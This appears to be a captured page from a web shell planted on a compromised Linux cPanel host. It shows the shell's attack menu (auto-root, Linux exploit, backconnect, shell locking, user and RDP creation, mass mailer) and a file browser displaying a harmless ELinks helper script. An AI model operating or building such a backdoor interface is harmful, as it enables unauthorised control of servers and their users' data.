Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.80.74
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
elinks-data /
examples /
lua /
[ HOME SHELL ]
Name
Size
Permission
Action
babelfish.lua
1.46
KB
-rw-r--r--
bm-to-elinks-bookmarks.lua
704
B
-rw-r--r--
bm.lua
8.54
KB
-rw-r--r--
config.lua
2.44
KB
-rw-r--r--
elinks-remote
719
B
-rwxr-xr-x
highlight.lua
637
B
-rw-r--r--
hooks.lua
18.32
KB
-rw-r--r--
hooks.lua.in
18.32
KB
-rw-r--r--
md5check.lua
1.47
KB
-rw-r--r--
remote.lua
1.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : elinks-remote
#!/bin/bash # # This script lets you pass URLs from external programs to ELinks easily. You # just call this script with URL as a parameter (just like i.e. "netscape # -remote url"), and then press 'x' in the ELinks instance where you want the # URL to be loaded. # # You can also press 'X' to save URL of currently selected link back to # ~/.elinks/external.url. # # Note that you also need remote.lua loaded in ELinks. # # These two scripts were contributed by Len Trigg <len@reeltwo.com>. # # XXX: Please note that elinks now ``natively'' support passing URLs from # external programs by using the --remote command line argument. It is # documented in the doc/remote.txt file. # echo $* >$HOME/.elinks/external.url
Close